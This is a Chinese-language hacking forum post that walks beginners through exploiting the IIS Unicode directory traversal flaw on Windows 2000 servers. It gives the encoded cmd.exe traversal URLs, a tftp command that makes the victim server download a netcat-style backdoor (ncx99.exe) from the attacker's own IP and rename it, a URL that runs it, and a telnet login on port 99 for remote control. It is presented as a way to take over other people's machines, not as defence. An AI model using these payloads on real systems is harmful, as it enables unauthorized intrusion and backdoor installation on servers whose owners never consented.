20CN网络安全小组第一代论坛
发表新主题  发表回复

个人资料 | 社区目录 用户登录 | | 论坛搜索 | 常见问题 | 论坛主页
  下一个最老的主题   下一个最新的主题
» 20CN网络安全小组第一代论坛   » 安 全 基 地   » 菜鸟乐园   » 怎样利用unicode漏洞得到系统管里员密码

   
作者 标题: 怎样利用unicode漏洞得到系统管里员密码
fish
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
利用Unicode漏洞控制Windows2000服务器的详细步骤。
大家好,unicode如今成为热门的漏洞之一,下面catsun将给大家详细讲解利用unicode漏洞进入Windows 2000的详细过程。由于关于Unicode的文章很多,就不讲述如何去寻找一个有此漏洞的主机,也不讲如何利用此漏洞修改主页,主要讲一下如何控制这个Windows2000机器。
开始:
现在我们找到的一台漏洞主机:202.100.100.1(假设)
当然下面的调用大家再熟悉不过: http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
目录被列出,到这,大家都知道,可以修改主页,删除或在服务器上移动一些文件了。
但此时您的权限很低,怎样得到更高得权限呢?方法也有不少,但成功率并不很高。

经过比较,让服务器下载木马的方法较好:

首先,下载http://www.cners.com/tools/unicode.zip
解压后有如下文件:
tftpd32.exe(一个FTP服务器)
ncx99.exe(telnet 到99端口)
这两个大家都熟悉吧,其他的不用管。
运行tftpd32.exe

这是一个小巧的FTP服务器,在运行它之前,建议关闭其他FTP服务器,保持tftpd运行,这时你的机器已经是一个FTP服务器了。

回到你的浏览器,在地址栏里填入:
http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i ???.???.???.??? GET ncx99.exe c:\\inetpub\\scripts\\sr.exe

???.???.???.???为你自己的IP,注意:c:\\inetpub\\scripts\\sr.exe 其中c:\\inetpub\\scripts\\为主机服务器目录,要看主机的具体情
况而定,sr.exe为被改名的ncx99.exe(自己选名字吧)。

然后等待...大概3分钟...IE浏览器左下角显示完成,红色漏斗消失,这时ncx99.exe已经上传到主机c:\inetpub\scripts\目录了,您可以自己检查一下。

再使用如下调用来执行ncx99.exe(sr.exe)
http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\sr.exe

然后您就可以 telnet 202.100.100.1 99

以后就看你怎么使用这台机器了。当然您上传什么控制文件也由您自己决定,这只是一个方法。
我推荐一个扫描工具“rscan”

IP: 已记录

 
发表新主题  发表回复 关闭主题 突出主题 移动主题 删除主题 下一个最老的主题   下一个最新的主题
 - 适于打印的主题视图
转到:
联系我们 | 20CN网络安全小组

Powered by Infopop Corporation
UBB.classic™ 6.5.0
NetDemon修改版 1.5.0, 20CN网络安全小组 版权所有。